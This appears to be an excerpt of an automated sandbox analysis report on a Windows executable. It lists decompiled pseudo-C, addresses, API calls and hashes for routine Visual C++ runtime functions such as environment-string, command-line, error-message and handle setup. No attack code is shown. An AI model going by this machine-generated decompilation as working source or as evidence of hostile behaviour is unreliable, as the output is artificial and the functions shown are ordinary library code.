                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402768() {
                                                                    				int _t13;
                                                                    				WCHAR* _t22;
                                                                    				void* _t24;
                                                                    				signed int _t25;
                                                                    				WCHAR* _t27;
                                                                    				void* _t28;
                                                                    				WCHAR* _t30;
                                                                    				short* _t44;
                                                                    				char* _t56;
                                                                    				short* _t57;
                                                                    				void* _t58;
                                                                    				WCHAR* _t59;
                                                                    				void* _t60;
                                                                    				char* _t62;
                                                                    				void* _t63;
                                                                    
                                                                    				_t13 =  *0x4064b8; // 0x1
                                                                    				_t59 = 0;
                                                                    				_t60 = 0;
                                                                    				if(_t13 != 0) {
                                                                    					__eflags = _t13 - 1;
                                                                    					if(_t13 != 1) {
                                                                    						__eflags = _t13 - 2;
                                                                    						if(_t13 != 2) {
                                                                    							L22:
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						}
                                                                    						L15:
                                                                    						__eflags = _t59;
                                                                    						if(_t59 != 0) {
                                                                    							L17:
                                                                    							__eflags =  *_t59;
                                                                    							_t56 = _t59;
                                                                    							if( *_t59 == 0) {
                                                                    								L20:
                                                                    								_t61 = _t60 + 1;
                                                                    								 *((intOrPtr*)(_t63 + 0x10)) = _t60 + 1;
                                                                    								_t44 = E004030A4(_t61 + _t61);
                                                                    								__eflags = _t44;
                                                                    								if(_t44 != 0) {
                                                                    									__eflags =  *_t59;
                                                                    									_t62 = _t59;
                                                                    									_t57 = _t44;
                                                                    									if( *_t59 == 0) {
                                                                    										L27:
                                                                    										 *_t57 =  *_t57 & 0x00000000;
                                                                    										L29:
                                                                    										FreeEnvironmentStringsA(_t59);
                                                                    										return _t44;
                                                                    									} else {
                                                                    										goto L25;
                                                                    									}
                                                                    									while(1) {
                                                                    										L25:
                                                                    										_t7 = _t63 + 0x10; // 0x4020ef
                                                                    										_t22 = MultiByteToWideChar( *0x406540, 1, _t62, 0xffffffff, _t57,  *_t7 - (_t57 - _t44 >> 1));
                                                                    										__eflags = _t22;
                                                                    										if(_t22 == 0) {
                                                                    											break;
                                                                    										}
                                                                    										_t24 = E00403150(_t62);
                                                                    										_t9 =  &(_t62[1]); // 0x1
                                                                    										_t62 = _t24 + _t9;
                                                                    										_t25 = E00403130(_t57);
                                                                    										__eflags =  *_t62;
                                                                    										_t57 = _t57 + 2 + _t25 * 2;
                                                                    										if( *_t62 != 0) {
                                                                    											continue;
                                                                    										}
                                                                    										goto L27;
                                                                    									}
                                                                    									E00403037(_t44);
                                                                    									_t44 = 0;
                                                                    									__eflags = 0;
                                                                    									goto L29;
                                                                    								}
                                                                    								FreeEnvironmentStringsA(_t59);
                                                                    								goto L22;
                                                                    							} else {
                                                                    								goto L18;
                                                                    							}
                                                                    							while(1) {
                                                                    								L18:
                                                                    								_t27 = MultiByteToWideChar( *0x406540, 1, _t56, 0xffffffff, 0, 0);
                                                                    								__eflags = _t27;
                                                                    								if(_t27 == 0) {
                                                                    									goto L22;
                                                                    								}
                                                                    								_t60 = _t60 + _t27;
                                                                    								_t28 = E00403150(_t56);
                                                                    								__eflags = _t56[_t28 + 1];
                                                                    								_t56 =  &(_t56[_t28 + 1]);
                                                                    								if(__eflags != 0) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L20;
                                                                    							}
                                                                    							goto L22;
                                                                    						}
                                                                    						_t59 = GetEnvironmentStrings();
                                                                    						__eflags = _t59;
                                                                    						if(_t59 == 0) {
                                                                    							goto L22;
                                                                    						}
                                                                    						goto L17;
                                                                    					}
                                                                    					L6:
                                                                    					if(_t59 != 0) {
                                                                    						L8:
                                                                    						_t30 = _t59;
                                                                    						if( *_t59 == 0) {
                                                                    							L11:
                                                                    							_t45 = _t30 - _t59 + 2;
                                                                    							_t58 = E004030A4(_t30 - _t59 + 2);
                                                                    							if(_t58 != 0) {
                                                                    								E004031D0(_t58, _t59, _t45);
                                                                    							}
                                                                    							FreeEnvironmentStringsW(_t59);
                                                                    							return _t58;
                                                                    						} else {
                                                                    							goto L9;
                                                                    						}
                                                                    						do {
                                                                    							do {
                                                                    								L9:
                                                                    								_t30 =  &(_t30[1]);
                                                                    							} while ( *_t30 != 0);
                                                                    							_t30 =  &(_t30[1]);
                                                                    						} while ( *_t30 != 0);
                                                                    						goto L11;
                                                                    					}
                                                                    					_t59 = GetEnvironmentStringsW();
                                                                    					if(_t59 == 0) {
                                                                    						goto L22;
                                                                    					}
                                                                    					goto L8;
                                                                    				}
                                                                    				_t59 = GetEnvironmentStringsW();
                                                                    				if(_t59 == 0) {
                                                                    					_t59 = GetEnvironmentStrings();
                                                                    					__eflags = _t59;
                                                                    					if(_t59 == 0) {
                                                                    						goto L22;
                                                                    					}
                                                                    					 *0x4064b8 = 2;
                                                                    					goto L15;
                                                                    				}
                                                                    				 *0x4064b8 = 1;
                                                                    				goto L6;
                                                                    			}


















                                                                    0x00402769
                                                                    0x00402777
                                                                    0x00402779
                                                                    0x00402784
                                                                    0x004027b2
                                                                    0x004027b5
                                                                    0x00402809
                                                                    0x0040280c
                                                                    0x0040286b
                                                                    0x0040286b
                                                                    0x00000000
                                                                    0x0040286b
                                                                    0x0040280e
                                                                    0x0040280e
                                                                    0x00402810
                                                                    0x0040281a
                                                                    0x0040281a
                                                                    0x0040281d
                                                                    0x0040281f
                                                                    0x0040284e
                                                                    0x0040284e
                                                                    0x0040284f
                                                                    0x0040285d
                                                                    0x00402860
                                                                    0x00402862
                                                                    0x00402873
                                                                    0x00402876
                                                                    0x00402878
                                                                    0x0040287a
                                                                    0x004028bb
                                                                    0x004028bb
                                                                    0x004028ca
                                                                    0x004028cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040287c
                                                                    0x0040287c
                                                                    0x0040287c
                                                                    0x00402895
                                                                    0x0040289b
                                                                    0x0040289d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004028a0
                                                                    0x004028a6
                                                                    0x004028a6
                                                                    0x004028aa
                                                                    0x004028af
                                                                    0x004028b5
                                                                    0x004028b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004028b9
                                                                    0x004028c2
                                                                    0x004028c8
                                                                    0x004028c8
                                                                    0x00000000
                                                                    0x004028c8
                                                                    0x00402865
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402821
                                                                    0x00402821
                                                                    0x00402830
                                                                    0x00402836
                                                                    0x00402838
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040283b
                                                                    0x0040283d
                                                                    0x00402842
                                                                    0x00402847
                                                                    0x0040284c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040284c
                                                                    0x00000000
                                                                    0x00402821
                                                                    0x00402814
                                                                    0x00402816
                                                                    0x00402818
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402818
                                                                    0x004027b7
                                                                    0x004027b9
                                                                    0x004027c7
                                                                    0x004027c9
                                                                    0x004027ce
                                                                    0x004027de
                                                                    0x004027e2
                                                                    0x004027ea
                                                                    0x004027ef
                                                                    0x004027ff
                                                                    0x00402804
                                                                    0x004027f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004027d0
                                                                    0x004027d0
                                                                    0x004027d0
                                                                    0x004027d1
                                                                    0x004027d2
                                                                    0x004027d8
                                                                    0x004027d9
                                                                    0x00000000
                                                                    0x004027d0
                                                                    0x004027bd
                                                                    0x004027c1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004027c1
                                                                    0x00402788
                                                                    0x0040278c
                                                                    0x0040279c
                                                                    0x0040279e
                                                                    0x004027a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004027a6
                                                                    0x00000000
                                                                    0x004027a6
                                                                    0x0040278e
                                                                    0x00000000

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,004020EF), ref: 00402786
                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,004020EF), ref: 0040279A
                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,004020EF), ref: 004027BB
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004027F2
                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,004020EF), ref: 00402812
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,004020EF), ref: 00402830
                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,004020EF), ref: 00402865
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000, @,?,00000000,?,?,?,004020EF), ref: 00402895
                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,004020EF), ref: 004028CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                    • String ID: @
                                                                    • API String ID: 158306478-124383662
                                                                    • Opcode ID: 742fff747372ddc5f5a4a31ec3bb5f6c55053eaba9baf2373a24781a052e9306
                                                                    • Instruction ID: 8c9ac7f65b5f2ccc2fcf31fe3e13e0e4d651834e3feb9d7db9463b6a46bc41e0
                                                                    • Opcode Fuzzy Hash: 742fff747372ddc5f5a4a31ec3bb5f6c55053eaba9baf2373a24781a052e9306
                                                                    • Instruction Fuzzy Hash: 064123365046116BDB217F759E4CB2B769CEB05718F25463BE802F73C0DAF88D4082AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E00402E45(void* __edi, long _a4) {
                                                                    				char _v164;
                                                                    				char _v424;
                                                                    				int _t17;
                                                                    				long _t19;
                                                                    				signed int _t42;
                                                                    				long _t47;
                                                                    				void* _t48;
                                                                    				signed int _t54;
                                                                    				void** _t56;
                                                                    				void* _t57;
                                                                    
                                                                    				_t48 = __edi;
                                                                    				_t47 = _a4;
                                                                    				_t42 = 0;
                                                                    				_t17 = 0x4060f0;
                                                                    				while(_t47 !=  *_t17) {
                                                                    					_t17 = _t17 + 8;
                                                                    					_t42 = _t42 + 1;
                                                                    					if(_t17 < 0x406180) {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				_t54 = _t42 << 3;
                                                                    				_t2 = _t54 + 0x4060f0; // 0x68000000
                                                                    				if(_t47 ==  *_t2) {
                                                                    					_t17 =  *0x406268; // 0x0
                                                                    					if(_t17 == 1 || _t17 == 0 &&  *0x406024 == 1) {
                                                                    						_t16 = _t54 + 0x4060f4; // 0x405368
                                                                    						_t56 = _t16;
                                                                    						_t19 = E00403150( *_t56);
                                                                    						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                                                                    					} else {
                                                                    						if(_t47 != 0xfc) {
                                                                    							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                                                                    								E00403E70( &_v424, "<program name unknown>");
                                                                    							}
                                                                    							_push(_t48);
                                                                    							_t49 =  &_v424;
                                                                    							if(E00403150( &_v424) + 1 > 0x3c) {
                                                                    								_t49 = E00403150( &_v424) +  &_v424 - 0x3b;
                                                                    								E00403F60(E00403150( &_v424) +  &_v424 - 0x3b, "...", 3);
                                                                    								_t57 = _t57 + 0x10;
                                                                    							}
                                                                    							E00403E70( &_v164, "Runtime Error!\n\nProgram: ");
                                                                    							E00403E80( &_v164, _t49);
                                                                    							E00403E80( &_v164, "\n\n");
                                                                    							_t12 = _t54 + 0x4060f4; // 0x405368
                                                                    							E00403E80( &_v164,  *_t12);
                                                                    							_t17 = E00403DDB( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t17;
                                                                    			}













                                                                    0x00402e45
                                                                    0x00402e4e
                                                                    0x00402e51
                                                                    0x00402e53
                                                                    0x00402e58
                                                                    0x00402e5c
                                                                    0x00402e5f
                                                                    0x00402e65
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402e65
                                                                    0x00402e6a
                                                                    0x00402e6d
                                                                    0x00402e73
                                                                    0x00402e79
                                                                    0x00402e81
                                                                    0x00402f72
                                                                    0x00402f72
                                                                    0x00402f7d
                                                                    0x00402f8f
                                                                    0x00402e98
                                                                    0x00402e9e
                                                                    0x00402eba
                                                                    0x00402ec8
                                                                    0x00402ece
                                                                    0x00402ed5
                                                                    0x00402ed7
                                                                    0x00402ee7
                                                                    0x00402f02
                                                                    0x00402f0a
                                                                    0x00402f0f
                                                                    0x00402f0f
                                                                    0x00402f1e
                                                                    0x00402f2b
                                                                    0x00402f3c
                                                                    0x00402f41
                                                                    0x00402f4e
                                                                    0x00402f64
                                                                    0x00402f6c
                                                                    0x00402e9e
                                                                    0x00402e81
                                                                    0x00402f97

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00402EB2
                                                                    • GetStdHandle.KERNEL32(000000F4,00405368,00000000,?,00000000,?), ref: 00402F88
                                                                    • WriteFile.KERNEL32(00000000), ref: 00402F8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$HandleModuleNameWrite
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 3784150691-4022980321
                                                                    • Opcode ID: 88fbfeb4c1d95fa6dc04fbcf8a8cb29eda3272d94df6b0c60894d36e6c1c876f
                                                                    • Instruction ID: 34a32bd733e87856778307dd540b43557dc55c4e69cc7722e37ab36410eb5d04
                                                                    • Opcode Fuzzy Hash: 88fbfeb4c1d95fa6dc04fbcf8a8cb29eda3272d94df6b0c60894d36e6c1c876f
                                                                    • Instruction Fuzzy Hash: E531F632A40219AEDF20EB60CD49F9B777CDF49344F10017BF945F61C1E6B89A448A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004028D5() {
                                                                    				int _t2;
                                                                    				char* _t14;
                                                                    				int _t20;
                                                                    				short* _t21;
                                                                    
                                                                    				_t2 =  *0x4064bc; // 0x1
                                                                    				if(_t2 != 0) {
                                                                    					if(_t2 != 1) {
                                                                    						if(_t2 != 2) {
                                                                    							L12:
                                                                    							return 0;
                                                                    						}
                                                                    						L8:
                                                                    						_t14 = GetCommandLineA();
                                                                    						_t20 = MultiByteToWideChar( *0x406540, 1, _t14, 0xffffffff, 0, 0);
                                                                    						if(_t20 == 0) {
                                                                    							goto L12;
                                                                    						}
                                                                    						_t21 = E004030A4(_t20 + _t20);
                                                                    						if(_t21 == 0) {
                                                                    							goto L12;
                                                                    						}
                                                                    						if(MultiByteToWideChar( *0x406540, 1, _t14, 0xffffffff, _t21, _t20) != 0) {
                                                                    							return _t21;
                                                                    						}
                                                                    						E00403037(_t21);
                                                                    						goto L12;
                                                                    					}
                                                                    					L6:
                                                                    					return GetCommandLineW();
                                                                    				}
                                                                    				if(GetCommandLineW() == 0) {
                                                                    					if(GetCommandLineA() == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					 *0x4064bc = 2;
                                                                    					goto L8;
                                                                    				}
                                                                    				 *0x4064bc = 1;
                                                                    				goto L6;
                                                                    			}







                                                                    0x004028d5
                                                                    0x004028ec
                                                                    0x00402915
                                                                    0x0040291e
                                                                    0x0040296b
                                                                    0x00000000
                                                                    0x0040296b
                                                                    0x00402920
                                                                    0x0040292a
                                                                    0x0040293b
                                                                    0x0040293f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040294a
                                                                    0x0040294f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402962
                                                                    0x00000000
                                                                    0x00402972
                                                                    0x00402965
                                                                    0x00000000
                                                                    0x0040296a
                                                                    0x00402917
                                                                    0x00000000
                                                                    0x00402917
                                                                    0x004028f2
                                                                    0x00402904
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402906
                                                                    0x00000000
                                                                    0x00402906
                                                                    0x004028f4
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(?,00000000,?,?,004020E5), ref: 004028EE
                                                                    • GetCommandLineA.KERNEL32(?,00000000,?,?,004020E5), ref: 00402900
                                                                    • GetCommandLineW.KERNEL32(?,00000000,?,?,004020E5), ref: 00402917
                                                                    • GetCommandLineA.KERNEL32(?,00000000,?,?,004020E5), ref: 00402920
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,004020E5), ref: 00402939
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,004020E5), ref: 0040295E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CommandLine$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 3068183746-0
                                                                    • Opcode ID: 30f9c07578f9d2d220889b88a4d149df62fb71d6f182f412a7c863525801d0a9
                                                                    • Instruction ID: f58d0bc1937a138f834de6328cb86a39617e63097a262e2bbd79f293356c3b37
                                                                    • Opcode Fuzzy Hash: 30f9c07578f9d2d220889b88a4d149df62fb71d6f182f412a7c863525801d0a9
                                                                    • Instruction Fuzzy Hash: 77112BB270451966EA205776AE8CF2736CCDB40768F210137F911F22D0E6FADC004ABC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 99%
                                                                    			E00402976() {
                                                                    				void** _v8;
                                                                    				struct _STARTUPINFOA _v76;
                                                                    				signed int* _t48;
                                                                    				signed int _t50;
                                                                    				long _t55;
                                                                    				signed int _t57;
                                                                    				signed int _t58;
                                                                    				int _t59;
                                                                    				signed char _t63;
                                                                    				signed int _t65;
                                                                    				void** _t67;
                                                                    				int _t68;
                                                                    				int _t69;
                                                                    				signed int* _t70;
                                                                    				int _t72;
                                                                    				intOrPtr* _t73;
                                                                    				signed int* _t75;
                                                                    				void* _t76;
                                                                    				void* _t84;
                                                                    				void* _t87;
                                                                    				int _t88;
                                                                    				signed int* _t89;
                                                                    				void** _t90;
                                                                    				signed int _t91;
                                                                    				int* _t92;
                                                                    
                                                                    				_t89 = E004030A4(0x480);
                                                                    				if(_t89 == 0) {
                                                                    					E00402161(0x1b);
                                                                    				}
                                                                    				 *0x406580 = _t89;
                                                                    				 *0x406680 = 0x20;
                                                                    				_t1 =  &(_t89[0x120]); // 0x480
                                                                    				_t48 = _t1;
                                                                    				while(_t89 < _t48) {
                                                                    					_t89[1] = _t89[1] & 0x00000000;
                                                                    					 *_t89 =  *_t89 | 0xffffffff;
                                                                    					_t89[2] = _t89[2] & 0x00000000;
                                                                    					_t89[1] = 0xa;
                                                                    					_t70 =  *0x406580; // 0x22648c0
                                                                    					_t89 =  &(_t89[9]);
                                                                    					_t48 =  &(_t70[0x120]);
                                                                    				}
                                                                    				GetStartupInfoA( &_v76);
                                                                    				__eflags = _v76.cbReserved2;
                                                                    				if(_v76.cbReserved2 == 0) {
                                                                    					L25:
                                                                    					_t72 = 0;
                                                                    					__eflags = 0;
                                                                    					do {
                                                                    						_t75 =  *0x406580; // 0x22648c0
                                                                    						_t50 = _t72 + _t72 * 8;
                                                                    						__eflags = _t75[_t50] - 0xffffffff;
                                                                    						_t90 =  &(_t75[_t50]);
                                                                    						if(_t75[_t50] != 0xffffffff) {
                                                                    							_t45 =  &(_t90[1]);
                                                                    							 *_t45 = _t90[1] | 0x00000080;
                                                                    							__eflags =  *_t45;
                                                                    							goto L37;
                                                                    						}
                                                                    						__eflags = _t72;
                                                                    						_t90[1] = 0x81;
                                                                    						if(_t72 != 0) {
                                                                    							asm("sbb eax, eax");
                                                                    							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                                                                    							__eflags = _t55;
                                                                    						} else {
                                                                    							_t55 = 0xfffffff6;
                                                                    						}
                                                                    						_t87 = GetStdHandle(_t55);
                                                                    						__eflags = _t87 - 0xffffffff;
                                                                    						if(_t87 == 0xffffffff) {
                                                                    							L33:
                                                                    							_t90[1] = _t90[1] | 0x00000040;
                                                                    						} else {
                                                                    							_t57 = GetFileType(_t87);
                                                                    							__eflags = _t57;
                                                                    							if(_t57 == 0) {
                                                                    								goto L33;
                                                                    							}
                                                                    							_t58 = _t57 & 0x000000ff;
                                                                    							 *_t90 = _t87;
                                                                    							__eflags = _t58 - 2;
                                                                    							if(_t58 != 2) {
                                                                    								__eflags = _t58 - 3;
                                                                    								if(_t58 == 3) {
                                                                    									_t90[1] = _t90[1] | 0x00000008;
                                                                    								}
                                                                    								goto L37;
                                                                    							}
                                                                    							goto L33;
                                                                    						}
                                                                    						L37:
                                                                    						_t72 = _t72 + 1;
                                                                    						__eflags = _t72 - 3;
                                                                    					} while (_t72 < 3);
                                                                    					return SetHandleCount( *0x406680);
                                                                    				}
                                                                    				_t59 = _v76.lpReserved2;
                                                                    				__eflags = _t59;
                                                                    				if(_t59 == 0) {
                                                                    					goto L25;
                                                                    				}
                                                                    				_t88 =  *_t59;
                                                                    				_t73 = _t59 + 4;
                                                                    				_v8 = _t73 + _t88;
                                                                    				__eflags = _t88 - 0x800;
                                                                    				if(_t88 >= 0x800) {
                                                                    					_t88 = 0x800;
                                                                    				}
                                                                    				__eflags =  *0x406680 - _t88; // 0x20
                                                                    				if(__eflags >= 0) {
                                                                    					L18:
                                                                    					_t91 = 0;
                                                                    					__eflags = _t88;
                                                                    					if(_t88 <= 0) {
                                                                    						goto L25;
                                                                    					} else {
                                                                    						goto L19;
                                                                    					}
                                                                    					do {
                                                                    						L19:
                                                                    						_t76 =  *_v8;
                                                                    						__eflags = _t76 - 0xffffffff;
                                                                    						if(_t76 == 0xffffffff) {
                                                                    							goto L24;
                                                                    						}
                                                                    						_t63 =  *_t73;
                                                                    						__eflags = _t63 & 0x00000001;
                                                                    						if((_t63 & 0x00000001) == 0) {
                                                                    							goto L24;
                                                                    						}
                                                                    						__eflags = _t63 & 0x00000008;
                                                                    						if((_t63 & 0x00000008) != 0) {
                                                                    							L23:
                                                                    							_t65 = _t91 & 0x0000001f;
                                                                    							__eflags = _t65;
                                                                    							_t67 =  &(0x406580[_t91 >> 5][_t65 + _t65 * 8]);
                                                                    							 *_t67 =  *_v8;
                                                                    							_t67[1] =  *_t73;
                                                                    							goto L24;
                                                                    						}
                                                                    						_t68 = GetFileType(_t76);
                                                                    						__eflags = _t68;
                                                                    						if(_t68 == 0) {
                                                                    							goto L24;
                                                                    						}
                                                                    						goto L23;
                                                                    						L24:
                                                                    						_v8 =  &(_v8[1]);
                                                                    						_t91 = _t91 + 1;
                                                                    						_t73 = _t73 + 1;
                                                                    						__eflags = _t91 - _t88;
                                                                    					} while (_t91 < _t88);
                                                                    					goto L25;
                                                                    				} else {
                                                                    					_t92 = 0x406584;
                                                                    					while(1) {
                                                                    						_t69 = E004030A4(0x480);
                                                                    						__eflags = _t69;
                                                                    						if(_t69 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						 *0x406680 =  *0x406680 + 0x20;
                                                                    						__eflags =  *0x406680;
                                                                    						 *_t92 = _t69;
                                                                    						_t13 = _t69 + 0x480; // 0x480
                                                                    						_t84 = _t13;
                                                                    						while(1) {
                                                                    							__eflags = _t69 - _t84;
                                                                    							if(_t69 >= _t84) {
                                                                    								break;
                                                                    							}
                                                                    							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                                                                    							 *_t69 =  *_t69 | 0xffffffff;
                                                                    							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                                                                    							 *((char*)(_t69 + 5)) = 0xa;
                                                                    							_t69 = _t69 + 0x24;
                                                                    							_t84 =  *_t92 + 0x480;
                                                                    						}
                                                                    						_t92 =  &(_t92[1]);
                                                                    						__eflags =  *0x406680 - _t88; // 0x20
                                                                    						if(__eflags < 0) {
                                                                    							continue;
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    					_t88 =  *0x406680; // 0x20
                                                                    					goto L18;
                                                                    				}
                                                                    			}




























                                                                    0x00402989
                                                                    0x0040298e
                                                                    0x00402992
                                                                    0x00402997
                                                                    0x00402998
                                                                    0x0040299e
                                                                    0x004029a8
                                                                    0x004029a8
                                                                    0x004029ae
                                                                    0x004029b2
                                                                    0x004029b6
                                                                    0x004029b9
                                                                    0x004029bd
                                                                    0x004029c1
                                                                    0x004029c6
                                                                    0x004029c9
                                                                    0x004029c9
                                                                    0x004029d4
                                                                    0x004029da
                                                                    0x004029df
                                                                    0x00402ab6
                                                                    0x00402ab6
                                                                    0x00402ab6
                                                                    0x00402ab8
                                                                    0x00402ab8
                                                                    0x00402abe
                                                                    0x00402ac1
                                                                    0x00402ac5
                                                                    0x00402ac8
                                                                    0x00402b17
                                                                    0x00402b17
                                                                    0x00402b17
                                                                    0x00000000
                                                                    0x00402b17
                                                                    0x00402aca
                                                                    0x00402acc
                                                                    0x00402ad0
                                                                    0x00402adc
                                                                    0x00402ade
                                                                    0x00402ade
                                                                    0x00402ad2
                                                                    0x00402ad4
                                                                    0x00402ad4
                                                                    0x00402ae8
                                                                    0x00402aea
                                                                    0x00402aed
                                                                    0x00402b06
                                                                    0x00402b06
                                                                    0x00402aef
                                                                    0x00402af0
                                                                    0x00402af6
                                                                    0x00402af8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402afa
                                                                    0x00402aff
                                                                    0x00402b01
                                                                    0x00402b04
                                                                    0x00402b0c
                                                                    0x00402b0f
                                                                    0x00402b11
                                                                    0x00402b11
                                                                    0x00000000
                                                                    0x00402b0f
                                                                    0x00000000
                                                                    0x00402b04
                                                                    0x00402b1b
                                                                    0x00402b1b
                                                                    0x00402b1c
                                                                    0x00402b1c
                                                                    0x00402b31
                                                                    0x00402b31
                                                                    0x004029e5
                                                                    0x004029e8
                                                                    0x004029ea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004029f0
                                                                    0x004029f2
                                                                    0x004029f8
                                                                    0x00402a00
                                                                    0x00402a02
                                                                    0x00402a04
                                                                    0x00402a04
                                                                    0x00402a06
                                                                    0x00402a0c
                                                                    0x00402a64
                                                                    0x00402a64
                                                                    0x00402a66
                                                                    0x00402a68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a6a
                                                                    0x00402a6a
                                                                    0x00402a6d
                                                                    0x00402a6f
                                                                    0x00402a72
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a74
                                                                    0x00402a76
                                                                    0x00402a78
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a7a
                                                                    0x00402a7c
                                                                    0x00402a89
                                                                    0x00402a90
                                                                    0x00402a90
                                                                    0x00402a9d
                                                                    0x00402aa5
                                                                    0x00402aa9
                                                                    0x00000000
                                                                    0x00402aa9
                                                                    0x00402a7f
                                                                    0x00402a85
                                                                    0x00402a87
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402aac
                                                                    0x00402aac
                                                                    0x00402ab0
                                                                    0x00402ab1
                                                                    0x00402ab2
                                                                    0x00402ab2
                                                                    0x00000000
                                                                    0x00402a0e
                                                                    0x00402a0e
                                                                    0x00402a13
                                                                    0x00402a18
                                                                    0x00402a1d
                                                                    0x00402a20
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a22
                                                                    0x00402a22
                                                                    0x00402a29
                                                                    0x00402a2b
                                                                    0x00402a2b
                                                                    0x00402a31
                                                                    0x00402a31
                                                                    0x00402a33
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a35
                                                                    0x00402a39
                                                                    0x00402a3c
                                                                    0x00402a40
                                                                    0x00402a46
                                                                    0x00402a49
                                                                    0x00402a49
                                                                    0x00402a51
